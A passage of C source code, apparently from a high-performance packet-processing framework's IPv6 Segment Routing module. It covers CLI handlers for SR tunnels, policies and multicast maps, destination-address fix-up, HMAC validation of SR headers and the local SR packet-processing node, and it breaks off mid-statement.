(!p) /* Either name parm not passed or no tunnel with that name found, show all */ { /* *INDENT-OFF* */ pool_foreach (t, sm->tunnels, ({ vec_add1 (tunnels, t); })); /* *INDENT-ON* */ } else /* Just show the one tunnel by name */ vec_add1 (tunnels, &sm->tunnels[p[0]]); if (vec_len (tunnels) == 0) vlib_cli_output (vm, "No SR tunnels configured"); for (i = 0; i < vec_len (tunnels); i++) { t = tunnels[i]; ip6_sr_tunnel_display (vm, t); } return 0; } /* *INDENT-OFF* */ VLIB_CLI_COMMAND (show_sr_tunnel_command, static) = { .path = "show sr tunnel", .short_help = "show sr tunnel [name <sr-tunnel-name>]", .function = show_sr_tunnel_fn, }; /* *INDENT-ON* */ /** * @brief Add or Delete a Segment Routing policy * * @param a ip6_sr_add_del_policy_args_t * * * @return retval int */ int ip6_sr_add_del_policy (ip6_sr_add_del_policy_args_t * a) { ip6_sr_main_t *sm = &sr_main; uword *p; ip6_sr_tunnel_t *t = 0; ip6_sr_policy_t *policy; u32 *tunnel_indices = 0; int i; if (a->is_del) { p = hash_get_mem (sm->policy_index_by_policy_name, a->name); if (!p) return -6; /* policy name not found */ policy = pool_elt_at_index (sm->policies, p[0]); vec_foreach_index (i, policy->tunnel_indices) { t = pool_elt_at_index (sm->tunnels, policy->tunnel_indices[i]); t->policy_index = ~0; } hash_unset_mem (sm->policy_index_by_policy_name, a->name); pool_put (sm->policies, policy); return 0; } if (!vec_len (a->tunnel_names)) return -3; /*tunnel name is required case */ vec_reset_length (tunnel_indices); /* Check tunnel names, add tunnel_index to policy */ for (i = 0; i < vec_len (a->tunnel_names); i++) { p = hash_get_mem (sm->tunnel_index_by_name, a->tunnel_names[i]); if (!p) return -4; /* tunnel name not found case */ t = pool_elt_at_index (sm->tunnels, p[0]); /* No need to check t==0. -3 condition above ensures name */ if (t->policy_index != ~0) return -5; /* tunnel name already associated with a policy */ /* Add to tunnel indicies */ vec_add1 (tunnel_indices, p[0]); } /* Add policy to ip6_sr_main_t */ pool_get (sm->policies, policy); policy->name = a->name; policy->tunnel_indices = tunnel_indices; hash_set_mem (sm->policy_index_by_policy_name, policy->name, policy - sm->policies); /* Yes, this could be construed as overkill but the last thing you should do is set the policy_index on the tunnel after everything is set in ip6_sr_main_t. If this is deemed overly cautious, could set this in the vec_len(tunnel_names) loop. */ for (i = 0; i < vec_len (policy->tunnel_indices); i++) { t = pool_elt_at_index (sm->tunnels, policy->tunnel_indices[i]); t->policy_index = policy - sm->policies; } return 0; } /** * @brief CLI Parser for Add or Delete a Segment Routing policy * * @param vm vlib_main_t * * @param input unformat_input_t * * @param cmd vlib_cli_command_t * * * @return error clib_error_t * */ static clib_error_t * sr_add_del_policy_command_fn (vlib_main_t * vm, unformat_input_t * input, vlib_cli_command_t * cmd) { int is_del = 0; u8 **tunnel_names = 0; u8 *tunnel_name = 0; u8 *name = 0; ip6_sr_add_del_policy_args_t _a, *a = &_a; int rv; while (unformat_check_input (input) != UNFORMAT_END_OF_INPUT) { if (unformat (input, "del")) is_del = 1; else if (unformat (input, "name %s", &name)) ; else if (unformat (input, "tunnel %s", &tunnel_name)) { if (tunnel_name) { vec_add1 (tunnel_names, tunnel_name); tunnel_name = 0; } } else break; } if (!name) return clib_error_return (0, "name of SR policy required"); memset (a, 0, sizeof (*a)); a->is_del = is_del; a->name = name; a->tunnel_names = tunnel_names; rv = ip6_sr_add_del_policy (a); vec_free (tunnel_names); switch (rv) { case 0: break; case -3: return clib_error_return (0, "tunnel name to associate to SR policy is required"); case -4: return clib_error_return (0, "tunnel name not found"); case -5: return clib_error_return (0, "tunnel already associated with policy"); case -6: return clib_error_return (0, "policy name %s not found", name); case -7: return clib_error_return (0, "TODO: deleting policy name %s", name); default: return clib_error_return (0, "BUG: ip6_sr_add_del_policy returns %d", rv); } return 0; } /* *INDENT-OFF* */ VLIB_CLI_COMMAND (sr_policy_command, static) = { .path = "sr policy", .short_help = "sr policy [del] name <policy-name> tunnel <sr-tunnel-name> [tunnel <sr-tunnel-name>]*", .function = sr_add_del_policy_command_fn, }; /* *INDENT-ON* */ /** * @brief CLI Parser for Displaying Segment Routing policy * * @param vm vlib_main_t * * @param input unformat_input_t * * @param cmd vlib_cli_command_t * * * @return error clib_error_t * */ static clib_error_t * show_sr_policy_fn (vlib_main_t * vm, unformat_input_t * input, vlib_cli_command_t * cmd) { static ip6_sr_policy_t **policies; ip6_sr_policy_t *policy; ip6_sr_tunnel_t *t; ip6_sr_main_t *sm = &sr_main; int i, j; uword *p = 0; u8 *name = 0; while (unformat_check_input (input) != UNFORMAT_END_OF_INPUT) { if (unformat (input, "name %s", &name)) { p = hash_get_mem (sm->policy_index_by_policy_name, name); if (!p) vlib_cli_output (vm, "policy with name %s not found. Showing all.", name); } else break; } vec_reset_length (policies); if (!p) /* Either name parm not passed or no policy with that name found, show all */ { /* *INDENT-OFF* */ pool_foreach (policy, sm->policies, ({ vec_add1 (policies, policy); })); /* *INDENT-ON* */ } else /* Just show the one policy by name and a summary of tunnel names */ { policy = pool_elt_at_index (sm->policies, p[0]); vec_add1 (policies, policy); } if (vec_len (policies) == 0) vlib_cli_output (vm, "No SR policies configured"); for (i = 0; i < vec_len (policies); i++) { policy = policies[i]; if (policy->name) vlib_cli_output (vm, "SR policy name: %s", (char *) policy->name); for (j = 0; j < vec_len (policy->tunnel_indices); j++) { t = pool_elt_at_index (sm->tunnels, policy->tunnel_indices[j]); ip6_sr_tunnel_display (vm, t); } } return 0; } /* *INDENT-OFF* */ VLIB_CLI_COMMAND (show_sr_policy_command, static) = { .path = "show sr policy", .short_help = "show sr policy [name <sr-policy-name>]", .function = show_sr_policy_fn, }; /* *INDENT-ON* */ /** * @brief Add or Delete a mapping of IP6 multicast address * to Segment Routing policy. * * @param a ip6_sr_add_del_multicastmap_args_t * * * @return retval int */ int ip6_sr_add_del_multicastmap (ip6_sr_add_del_multicastmap_args_t * a) { uword *p; ip6_sr_tunnel_t *t; ip6_sr_main_t *sm = &sr_main; ip6_sr_policy_t *pt; if (a->is_del) { /* clean up the adjacency */ p = hash_get_mem (sm->policy_index_by_multicast_address, a->multicast_address); } else { /* Get our policy by policy_name */ p = hash_get_mem (sm->policy_index_by_policy_name, a->policy_name); } if (!p) return -1; pt = pool_elt_at_index (sm->policies, p[0]); /* Get the first tunnel associated with policy populate the fib adjacency. From there, since this tunnel will have it's policy_index != ~0 it will be the trigger in the dual_loop to pull up the policy and make a copy-rewrite for each tunnel in the policy */ t = pool_elt_at_index (sm->tunnels, pt->tunnel_indices[0]); /* * Stick the tunnel index into the rewrite header. * * Unfortunately, inserting an SR header according to the various * RFC's requires parsing through the ip6 header, perhaps consing a * buffer onto the head of the vlib_buffer_t, etc. We don't use the * normal reverse bcopy rewrite code. * * We don't handle ugly RFC-related cases yet, but I'm sure PL will complain * at some point... */ dpo_id_t dpo = DPO_NULL; dpo_set (&dpo, sr_dpo_type, DPO_PROTO_IP6, t - sm->tunnels); /* Construct a FIB entry for multicast using the rx/tx fib from the first tunnel */ fib_prefix_t pfx = { .fp_proto = FIB_PROTOCOL_IP6, .fp_len = 128, .fp_addr = { .ip6 = *a->multicast_address, } }; fib_table_entry_special_dpo_add (t->rx_fib_index, &pfx, FIB_SOURCE_SR, FIB_ENTRY_FLAG_EXCLUSIVE, &dpo); dpo_reset (&dpo); u8 *mcast_copy = 0; mcast_copy = vec_new (ip6_address_t, 1); memcpy (mcast_copy, a->multicast_address, sizeof (ip6_address_t)); if (a->is_del) { hash_unset_mem (sm->policy_index_by_multicast_address, mcast_copy); vec_free (mcast_copy); return 0; } /* else */ hash_set_mem (sm->policy_index_by_multicast_address, mcast_copy, pt - sm->policies); return 0; } /** * @brief CLI Parser for Adding or Delete a mapping of IP6 multicast address * to Segment Routing policy. * * @param vm vlib_main_t * * @param input unformat_input_t * * @param cmd vlib_cli_command_t * * * @return error clib_error_t * */ static clib_error_t * sr_add_del_multicast_map_command_fn (vlib_main_t * vm, unformat_input_t * input, vlib_cli_command_t * cmd) { int is_del = 0; ip6_address_t multicast_address; u8 *policy_name = 0; int multicast_address_set = 0; ip6_sr_add_del_multicastmap_args_t _a, *a = &_a; int rv; while (unformat_check_input (input) != UNFORMAT_END_OF_INPUT) { if (unformat (input, "del")) is_del = 1; else if (unformat (input, "address %U", unformat_ip6_address, &multicast_address)) multicast_address_set = 1; else if (unformat (input, "sr-policy %s", &policy_name)) ; else break; } if (!is_del && !policy_name) return clib_error_return (0, "name of sr policy required"); if (!multicast_address_set) return clib_error_return (0, "multicast address required"); memset (a, 0, sizeof (*a)); a->is_del = is_del; a->multicast_address = &multicast_address; a->policy_name = policy_name; #if DPDK > 0 /*Cannot call replicate or configure multicast map yet without DPDK */ rv = ip6_sr_add_del_multicastmap (a); #else return clib_error_return (0, "cannot use multicast replicate spray case without DPDK installed"); #endif /* DPDK */ switch (rv) { case 0: break; case -1: return clib_error_return (0, "no policy with name: %s", policy_name); case -2: return clib_error_return (0, "multicast map someting "); case -3: return clib_error_return (0, "tunnel name to associate to SR policy is required"); case -7: return clib_error_return (0, "TODO: deleting policy name %s", policy_name); default: return clib_error_return (0, "BUG: ip6_sr_add_del_policy returns %d", rv); } return 0; } /* *INDENT-OFF* */ VLIB_CLI_COMMAND (sr_multicast_map_command, static) = { .path = "sr multicast-map", .short_help = "sr multicast-map address <multicast-ip6-address> sr-policy <sr-policy-name> [del]", .function = sr_add_del_multicast_map_command_fn, }; /* *INDENT-ON* */ /** * @brief CLI Parser for Displaying a mapping of IP6 multicast address * to Segment Routing policy. * * @param vm vlib_main_t * * @param input unformat_input_t * * @param cmd vlib_cli_command_t * * * @return error clib_error_t * */ static clib_error_t * show_sr_multicast_map_fn (vlib_main_t * vm, unformat_input_t * input, vlib_cli_command_t * cmd) { ip6_sr_main_t *sm = &sr_main; u8 *key = 0; u32 value; ip6_address_t multicast_address; ip6_sr_policy_t *pt; /* pull all entries from the hash table into vector for display */ /* *INDENT-OFF* */ hash_foreach_mem (key, value, sm->policy_index_by_multicast_address, ({ if (!key) vlib_cli_output (vm, "no multicast maps configured"); else { multicast_address = *((ip6_address_t *)key); pt = pool_elt_at_index (sm->policies, value); if (pt) { vlib_cli_output (vm, "address: %U policy: %s", format_ip6_address, &multicast_address, pt->name); } else vlib_cli_output (vm, "BUG: policy not found for address: %U with policy index %d", format_ip6_address, &multicast_address, value); } })); /* *INDENT-ON* */ return 0; } /* *INDENT-OFF* */ VLIB_CLI_COMMAND (show_sr_multicast_map_command, static) = { .path = "show sr multicast-map", .short_help = "show sr multicast-map", .function = show_sr_multicast_map_fn, }; /* *INDENT-ON* */ #define foreach_sr_fix_dst_addr_next \ _(DROP, "error-drop") /** * @brief Struct for valid next-nodes for SR fix destination address node */ typedef enum { #define _(s,n) SR_FIX_DST_ADDR_NEXT_##s, foreach_sr_fix_dst_addr_next #undef _ SR_FIX_DST_ADDR_N_NEXT, } sr_fix_dst_addr_next_t; /** * @brief Error strings for SR Fix Destination rewrite */ static char *sr_fix_dst_error_strings[] = { #define sr_fix_dst_error(n,s) s, #include "sr_fix_dst_error.def" #undef sr_fix_dst_error }; /** * @brief Struct for errors for SR Fix Destination rewrite */ typedef enum { #define sr_fix_dst_error(n,s) SR_FIX_DST_ERROR_##n, #include "sr_fix_dst_error.def" #undef sr_fix_dst_error SR_FIX_DST_N_ERROR, } sr_fix_dst_error_t; /** * @brief Information for fix address trace */ typedef struct { ip6_address_t src, dst; u32 next_index; u32 adj_index; u8 sr[256]; } sr_fix_addr_trace_t; /** * @brief Formatter for fix address trace */ u8 * format_sr_fix_addr_trace (u8 * s, va_list * args) { CLIB_UNUSED (vlib_main_t * vm) = va_arg (*args, vlib_main_t *); CLIB_UNUSED (vlib_node_t * node) = va_arg (*args, vlib_node_t *); sr_fix_addr_trace_t *t = va_arg (*args, sr_fix_addr_trace_t *); vnet_hw_interface_t *hi = 0; ip_adjacency_t *adj; ip6_main_t *im = &ip6_main; ip_lookup_main_t *lm = &im->lookup_main; vnet_main_t *vnm = vnet_get_main (); if (t->adj_index != ~0) { adj = ip_get_adjacency (lm, t->adj_index); hi = vnet_get_sup_hw_interface (vnm, adj->rewrite_header.sw_if_index); } s = format (s, "SR-FIX_ADDR: next %s ip6 src %U dst %U\n", (t->next_index == SR_FIX_DST_ADDR_NEXT_DROP) ? "drop" : "output", format_ip6_address, &t->src, format_ip6_address, &t->dst); if (t->next_index != SR_FIX_DST_ADDR_NEXT_DROP) { s = format (s, "%U\n", format_ip6_sr_header, t->sr, 1 /* print_hmac */ ); s = format (s, " output via %s", hi ? (char *) (hi->name) : "Invalid adj"); } return s; } /** * @brief Fix SR destination address - dual-loop * * @node sr-fix-dst-addr * @param vm vlib_main_t * * @param node vlib_node_runtime_t * * @param from_frame vlib_frame_t * * * @return from_frame->n_vectors uword */ static uword sr_fix_dst_addr (vlib_main_t * vm, vlib_node_runtime_t * node, vlib_frame_t * from_frame) { u32 n_left_from, next_index, *from, *to_next; ip6_main_t *im = &ip6_main; ip_lookup_main_t *lm = &im->lookup_main; from = vlib_frame_vector_args (from_frame); n_left_from = from_frame->n_vectors; next_index = node->cached_next_index; while (n_left_from > 0) { u32 n_left_to_next; vlib_get_next_frame (vm, node, next_index, to_next, n_left_to_next); #if 0 while (0 && n_left_from >= 4 && n_left_to_next >= 2) { u32 bi0, bi1; __attribute__ ((unused)) vlib_buffer_t *b0, *b1; u32 next0 = SR_FIX_DST_ADDR_NEXT_DROP; u32 next1 = SR_FIX_DST_ADDR_NEXT_DROP; /* Prefetch next iteration. */ { vlib_buffer_t *p2, *p3; p2 = vlib_get_buffer (vm, from[2]); p3 = vlib_get_buffer (vm, from[3]); vlib_prefetch_buffer_header (p2, LOAD); vlib_prefetch_buffer_header (p3, LOAD); } bi0 = from[0]; bi1 = from[1]; to_next[0] = bi0; to_next[1] = bi1; from += 2; to_next += 2; n_left_to_next -= 2; n_left_from -= 2; b0 = vlib_get_buffer (vm, bi0); b1 = vlib_get_buffer (vm, bi1); vlib_validate_buffer_enqueue_x2 (vm, node, next_index, to_next, n_left_to_next, bi0, bi1, next0, next1); } #endif while (n_left_from > 0 && n_left_to_next > 0) { u32 bi0; vlib_buffer_t *b0; ip6_header_t *ip0; ip_adjacency_t *adj0; ip6_sr_header_t *sr0; u32 next0 = SR_FIX_DST_ADDR_NEXT_DROP; ip6_address_t *new_dst0; ethernet_header_t *eh0; bi0 = from[0]; to_next[0] = bi0; from += 1; to_next += 1; n_left_from -= 1; n_left_to_next -= 1; b0 = vlib_get_buffer (vm, bi0); adj0 = ip_get_adjacency (lm, vnet_buffer (b0)->ip.adj_index[VLIB_TX]); next0 = adj0->mcast_group_index; /* We should be pointing at an Ethernet header... */ eh0 = vlib_buffer_get_current (b0); ip0 = (ip6_header_t *) (eh0 + 1); sr0 = (ip6_sr_header_t *) (ip0 + 1); /* We'd better find an SR header... */ if (PREDICT_FALSE (ip0->protocol != IPPROTO_IPV6_ROUTE)) { b0->error = node->errors[SR_FIX_DST_ERROR_NO_SR_HEADER]; goto do_trace0; } else { /* * We get here from sr_rewrite or sr_local, with * sr->segments_left pointing at the (copy of the original) dst * address. Use it, then increment sr0->segments_left. */ /* Out of segments? Turf the packet */ if (PREDICT_FALSE (sr0->segments_left == 0)) { b0->error = node->errors[SR_FIX_DST_ERROR_NO_MORE_SEGMENTS]; goto do_trace0; } /* * Rewrite the packet with the original dst address * We assume that the last segment (in processing order) contains * the original dst address. The list is reversed, so sr0->segments * contains the original dst address. */ new_dst0 = sr0->segments; ip0->dst_address.as_u64[0] = new_dst0->as_u64[0]; ip0->dst_address.as_u64[1] = new_dst0->as_u64[1]; } do_trace0: if (PREDICT_FALSE (b0->flags & VLIB_BUFFER_IS_TRACED)) { sr_fix_addr_trace_t *t = vlib_add_trace (vm, node, b0, sizeof (*t)); t->next_index = next0; t->adj_index = ~0; if (next0 != SR_FIX_DST_ADDR_NEXT_DROP) { t->adj_index = vnet_buffer (b0)->ip.adj_index[VLIB_TX]; clib_memcpy (t->src.as_u8, ip0->src_address.as_u8, sizeof (t->src.as_u8)); clib_memcpy (t->dst.as_u8, ip0->dst_address.as_u8, sizeof (t->dst.as_u8)); clib_memcpy (t->sr, sr0, sizeof (t->sr)); } } vlib_validate_buffer_enqueue_x1 (vm, node, next_index, to_next, n_left_to_next, bi0, next0); } vlib_put_next_frame (vm, node, next_index, n_left_to_next); } return from_frame->n_vectors; } /* *INDENT-OFF* */ VLIB_REGISTER_NODE (sr_fix_dst_addr_node) = { .function = sr_fix_dst_addr, .name = "sr-fix-dst-addr", /* Takes a vector of packets. */ .vector_size = sizeof (u32), .format_trace = format_sr_fix_addr_trace, .format_buffer = format_ip6_sr_header_with_length, .runtime_data_bytes = 0, .n_errors = SR_FIX_DST_N_ERROR, .error_strings = sr_fix_dst_error_strings, .n_next_nodes = SR_FIX_DST_ADDR_N_NEXT, .next_nodes = { #define _(s,n) [SR_FIX_DST_ADDR_NEXT_##s] = n, foreach_sr_fix_dst_addr_next #undef _ }, }; /* *INDENT-ON* */ VLIB_NODE_FUNCTION_MULTIARCH (sr_fix_dst_addr_node, sr_fix_dst_addr) static clib_error_t *sr_init (vlib_main_t * vm) { ip6_sr_main_t *sm = &sr_main; clib_error_t *error = 0; vlib_node_t *ip6_lookup_node, *ip6_rewrite_node; if ((error = vlib_call_init_function (vm, ip_main_init))) return error; if ((error = vlib_call_init_function (vm, ip6_lookup_init))) return error; sm->vlib_main = vm; sm->vnet_main = vnet_get_main (); vec_validate (sm->hmac_keys, 0); sm->hmac_keys[0].shared_secret = (u8 *) 0xdeadbeef; sm->tunnel_index_by_key = hash_create_mem (0, sizeof (ip6_sr_tunnel_key_t), sizeof (uword)); sm->tunnel_index_by_name = hash_create_string (0, sizeof (uword)); sm->policy_index_by_policy_name = hash_create_string (0, sizeof (uword)); sm->policy_index_by_multicast_address = hash_create_mem (0, sizeof (ip6_address_t), sizeof (uword)); sm->hmac_key_by_shared_secret = hash_create_string (0, sizeof (uword)); ip6_register_protocol (IPPROTO_IPV6_ROUTE, sr_local_node.index); ip6_lookup_node = vlib_get_node_by_name (vm, (u8 *) "ip6-lookup"); ASSERT (ip6_lookup_node); ip6_rewrite_node = vlib_get_node_by_name (vm, (u8 *) "ip6-rewrite"); ASSERT (ip6_rewrite_node); #if DPDK > 0 /* Cannot run replicate without DPDK */ /* Add a disposition to sr_replicate for the sr multicast replicate node */ sm->ip6_lookup_sr_replicate_index = vlib_node_add_next (vm, ip6_lookup_node->index, sr_replicate_node.index); #endif /* DPDK */ /* Add a disposition to ip6_rewrite for the sr dst address hack node */ sm->ip6_rewrite_sr_next_index = vlib_node_add_next (vm, ip6_rewrite_node->index, sr_fix_dst_addr_node.index); OpenSSL_add_all_digests (); sm->md = (void *) EVP_get_digestbyname ("sha1"); sm->hmac_ctx = clib_mem_alloc (sizeof (HMAC_CTX)); sr_dpo_type = dpo_register_new_type (&sr_vft, sr_nodes); return error; } VLIB_INIT_FUNCTION (sr_init); /** * @brief Definition of next-nodes for SR local */ #define foreach_sr_local_next \ _ (ERROR, "error-drop") \ _ (IP6_LOOKUP, "ip6-lookup") /** * @brief Struct for definition of next-nodes for SR local */ typedef enum { #define _(s,n) SR_LOCAL_NEXT_##s, foreach_sr_local_next #undef _ SR_LOCAL_N_NEXT, } sr_local_next_t; /** * @brief Struct for packet trace of SR local */ typedef struct { u8 next_index; u8 sr_valid; ip6_address_t src, dst; u16 length; u8 sr[256]; } sr_local_trace_t; /** * @brief Definition of SR local error-strings */ static char *sr_local_error_strings[] = { #define sr_error(n,s) s, #include "sr_error.def" #undef sr_error }; /** * @brief Struct for definition of SR local error-strings */ typedef enum { #define sr_error(n,s) SR_LOCAL_ERROR_##n, #include "sr_error.def" #undef sr_error SR_LOCAL_N_ERROR, } sr_local_error_t; /** * @brief Format SR local trace * * @param s u8 * * @param args va_list * * * @return s u8 * */ u8 * format_sr_local_trace (u8 * s, va_list * args) { CLIB_UNUSED (vlib_main_t * vm) = va_arg (*args, vlib_main_t *); CLIB_UNUSED (vlib_node_t * node) = va_arg (*args, vlib_node_t *); sr_local_trace_t *t = va_arg (*args, sr_local_trace_t *); s = format (s, "SR-LOCAL: src %U dst %U len %u next_index %d", format_ip6_address, &t->src, format_ip6_address, &t->dst, t->length, t->next_index); if (t->sr_valid) s = format (s, "\n %U", format_ip6_sr_header, t->sr, 1 /* print_hmac */ ); else s = format (s, "\n popped SR header"); return s; } /* $$$$ fixme: smp, don't copy data, cache input, output (maybe) */ /** * @brief Validate the SR HMAC * * @param sm ip6_sr_main_t * * @param ip ip6_header_t * * @param sr ip6_sr_header_t * * * @return retval int */ static int sr_validate_hmac (ip6_sr_main_t * sm, ip6_header_t * ip, ip6_sr_header_t * sr) { u32 key_index; static u8 *keybuf; u8 *copy_target; int first_segment; ip6_address_t *addrp; int i; ip6_sr_hmac_key_t *hmac_key; static u8 *signature; u32 sig_len; key_index = sr->hmac_key; /* No signature? Pass... */ if (key_index == 0) return 0; /* We don't know about this key? Fail... */ if (key_index >= vec_len (sm->hmac_keys)) return 1; vec_validate (signature, SHA256_DIGEST_LENGTH - 1); hmac_key = sm->hmac_keys + key_index; vec_reset_length (keybuf); /* pkt ip6 src address */ vec_add2 (keybuf, copy_target, sizeof (ip6_address_t)); clib_memcpy (copy_target, ip->src_address.as_u8, sizeof (ip6_address_t)); /* last segment */ vec_add2 (keybuf, copy_target, 1); copy_target[0] = sr->first_segment; /* octet w/ bit 0 = "clean" flag */ vec_add2 (keybuf, copy_target, 1); copy_target[0] = (sr->flags & clib_host_to_net_u16 (IP6_SR_HEADER_FLAG_CLEANUP)) ? 0x80 : 0; /* hmac key id */ vec_add2 (keybuf, copy_target, 1); copy_target[0] = sr->hmac_key; first_segment = sr->first_segment; addrp = sr->segments; /* segments */ for (i = 0; i <= first_segment; i++) { vec_add2 (keybuf, copy_target, sizeof (ip6_address_t)); clib_memcpy (copy_target, addrp->as_u8, sizeof (ip6_address_t)); addrp++; } if (sm->is_debug) clib_warning ("verify key index %d keybuf: %U", key_index, format_hex_bytes, keybuf, vec_len (keybuf)); /* shared secret */ /* SHA1 is shorter than SHA-256 */ memset (signature, 0, vec_len (signature)); HMAC_CTX_init (sm->hmac_ctx); if (!HMAC_Init (sm->hmac_ctx, hmac_key->shared_secret, vec_len (hmac_key->shared_secret), sm->md)) clib_warning ("barf1"); if (!HMAC_Update (sm->hmac_ctx, keybuf, vec_len (keybuf))) clib_warning ("barf2"); if (!HMAC_Final (sm->hmac_ctx, signature, &sig_len)) clib_warning ("barf3"); HMAC_CTX_cleanup (sm->hmac_ctx); if (sm->is_debug) clib_warning ("computed signature len %d, value %U", sig_len, format_hex_bytes, signature, vec_len (signature)); /* Point at the SHA signature in the packet */ addrp++; if (sm->is_debug) clib_warning ("read signature %U", format_hex_bytes, addrp, SHA256_DIGEST_LENGTH); return memcmp (signature, addrp, SHA256_DIGEST_LENGTH); } /** * @brief SR local node * @node sr-local * * @param vm vlib_main_t * * @param node vlib_node_runtime_t * * @param from_frame vlib_frame_t * * * @return from_frame->n_vectors uword */ static uword sr_local (vlib_main_t * vm, vlib_node_runtime_t * node, vlib_frame_t * from_frame) { u32 n_left_from, next_index, *from, *to_next; ip6_sr_main_t *sm = &sr_main; u32 (*sr_local_cb) (vlib_main_t *, vlib_node_runtime_t *, vlib_buffer_t *, ip6_header_t *, ip6_sr_header_t *); sr_local_cb = sm->sr_local_cb; from = vlib_frame_vector_args (from_frame); n_left_from = from_frame->n_vectors; next_index = node->cached_next_index; while (n_left_from > 0) { u32 n_left_to_next; vlib_get_next_frame (vm, node, next_index, to_next, n_left_to_next); while (n_left_from >= 4 && n_left_to_next >= 2) { u32 bi0, bi1; vlib_buffer_t *b0, *b1; ip6_header_t *ip0, *ip1; ip6_sr_header_t *sr0, *sr1; ip6_address_t *new_dst0, *new_dst1; u32 next0 = SR_LOCAL_NEXT_IP6_LOOKUP; u32 next1 = SR_LOCAL_NEXT_IP6_LOOKUP; /* Prefetch next iteration. */ { vlib_buffer_t *p2, *p3; p2 = vlib_get_buffer (vm, from[2]); p3 = vlib_get_buffer (vm, from[3]); vlib_prefetch_buffer_header (p2, LOAD); vlib_prefetch_buffer_header (p3, LOAD); CLIB_PREFETCH (p2->data, 2 * CLIB_CACHE_LINE_BYTES, LOAD); CLIB_PREFETCH (p3->data, 2 * CLIB_CACHE_LINE_BYTES, LOAD); } bi0 = from[0]; bi1 = from[1]; to_next[0] = bi0; to_next[1] = bi1; from += 2; to_next += 2; n_left_to_next -= 2; n_left_from -= 2; b0 = vlib_get_buffer (vm, bi0); ip0 = vlib_buffer_get_current (b0); sr0 = (ip6_sr_header_t *) (ip0 + 1); if (PREDICT_FALSE (sr0->type != ROUTING_HEADER_TYPE_SR)) { next0 = SR_LOCAL_NEXT_ERROR; b0->error = node->errors[SR_LOCAL_ERROR_BAD_ROUTING_HEADER_TYPE]; goto do_trace0; } /* Out of segments? Turf the packet */ if (PREDICT_FALSE (sr0->segments_left == 0)) { next0 = SR_LOCAL_NEXT_ERROR; b0->error = node->errors[SR_LOCAL_ERROR_NO_MORE_SEGMENTS]; goto do_trace0; } if (PREDICT_FALSE (sm->validate_hmac)) { if (sr_validate_hmac (sm, ip0, sr0)) { next0 = SR_LOCAL_NEXT_ERROR; b0->error = node->errors[SR_LOCAL_ERROR_HMAC_INVALID]; goto do_trace0; } } next0 = sr_local_cb ? sr_local_cb (vm, node, b0, ip0, sr0) : next0; /* * To suppress rewrite, return ~SR_LOCAL_NEXT_xxx */ if (PREDICT_FALSE (next0 & 0x80000000)) { next0 ^= 0xFFFFFFFF; if (PREDICT_FALSE (next0 == SR_LOCAL_NEXT_ERROR)) b0->error = node->errors[SR_LOCAL_ERROR_APP_CALLBACK]; } else { u32 segment_index0; segment_index0 = sr0->segments_left - 1; /* Rewrite the packet */ new_dst0 = (ip6_address_t *) (sr0->segments + segment_index0); ip0->dst_address.as_u64[0] = new_dst0->as_u64[0]; ip0->dst_address.as_u64[1] = new_dst0->as_u64[1]; if (PREDICT_TRUE (sr0->segments_left > 0)) sr0->segments_left -= 1; } /* End of the path. Clean up the SR header, or not */ if (PREDICT_FALSE (sr0->segments_left == 0 && (sr0->flags & clib_host_to_net_u16 (IP6_SR_HEADER_FLAG_CLEANUP)))) { u64 *copy_dst0, *copy_src0; u16 new_l0; /* * Copy the ip6 header right by the (real) length of the * sr header. Here's another place which assumes that * the sr header is the only extention header. */ ip0->protocol = sr0->protocol; vlib_buffer_advance (b0, (sr0->length + 1) * 8); new_l0 = clib_net_to_host_u16 (ip0->payload_length) - (sr0->length + 1) * 8; ip0->payload_length = clib_host_to_net_u16 (new_l0); copy_src0 = (u64 *) ip0; copy_dst0 = copy_src0 + (sr0->length + 1); copy_dst0[4] = copy_src0[4]; copy_dst0[3] = copy_src0[3]; copy_dst0[2] = copy_src0[2]; copy_dst0[1] = copy_src0[1]; copy_dst0[0] = copy_src0[0]; sr0 = 0; } do_trace0: if (PREDICT_FALSE (b0->flags & VLIB_BUFFER_IS_TRACED)) { sr_local_trace_t *tr = vlib_add_trace (vm, node, b0, sizeof (*tr)); clib_memcpy (tr->src.as_u8, ip0->src_address.as_u8, sizeof (tr->src.as_u8)); clib_memcpy (tr->dst.as_u8, ip0->dst_address.as_u8, sizeof (tr->dst.as_u8)); tr->length = vlib_buffer_length_in_chain (vm, b0); tr->next_index = next0; tr->sr_valid = sr0 != 0; if (tr->sr_valid) clib_memcpy (tr->sr, sr0, sizeof (tr->sr)); } b1 = vlib_get_buffer (vm, bi1); ip1 = vlib_buffer_get_current (b1); sr1 = (ip6_sr_header_t *) (ip1 + 1); if (PREDICT_FALSE (sr1->type != ROUTING_HEADER_TYPE_SR)) { next1 = SR_LOCAL_NEXT_ERROR; b1->error = node->errors[SR_LOCAL_ERROR_BAD_ROUTING_HEADER_TYPE]; goto do_trace1; } /* Out of segments? Turf the packet */ if (PREDICT_FALSE (sr1->segments_left == 0)) { next1 = SR_LOCAL_NEXT_ERROR; b1->error = node->errors[SR_LOCAL_ERROR_NO_MORE_SEGMENTS]; goto do_trace1; } if (PREDICT_FALSE (sm->validate_hmac)) { if (sr_validate_hmac (sm, ip1, sr1)) { next1 = SR_LOCAL_NEXT_ERROR; b1->error = node->errors[SR_LOCAL_ERROR_HMAC_INVALID]; goto do_trace1; } } next1 = sr_local_cb ? sr_local_cb (vm, node, b1, ip1, sr1) : next1; /* * To suppress rewrite, return ~SR_LOCAL_NEXT_xxx */ if (PREDICT_FALSE (next1 & 0x80000000)) { next1 ^= 0xFFFFFFFF; if (PREDICT_FALSE (next1 == SR_LOCAL_NEXT_ERROR)) b1->error = node->errors[SR_LOCAL_ERROR_APP_CALLBACK]; } else { u32 segment_index1; segment_index1 = sr1->segments_left - 1; /* Rewrite the packet */ new_dst1 = (ip6_address_t *) (sr1->segments + segment_index1); ip1->dst_address.as_u64[0] = new_dst1->as_u64[0]; ip1->dst_address.as_u64[1] = new_dst1->as_u64[1]; if (PREDICT_TRUE (sr1->segments_left > 0)) sr1->segments_left -= 1; } /* End of the path. Clean up the SR header, or not */ if (PREDICT_FALSE (sr1->segments_left == 0 && (sr1->flags & clib_host_to_net_u16 (IP6_SR_HEADER_FLAG_CLEANUP)))) { u64 *copy_dst1, *copy_src1; u16 new_l1; /* * Copy the ip6 header right by the (real) length of the * sr header. Here's another place which assumes that * the sr header is the only extention header. */ ip1->protocol = sr1->protocol; vlib_buffer_advance (b1, (sr1->length + 1) * 8); new_l1 = clib_net_to_host_u16 (ip1->payload_length) - (sr1->length + 1) * 8; ip1->payload_length = clib_host_to_net_u16 (new_l1); copy_src1 = (u64 *) ip1; copy_dst1 = copy_src1 + 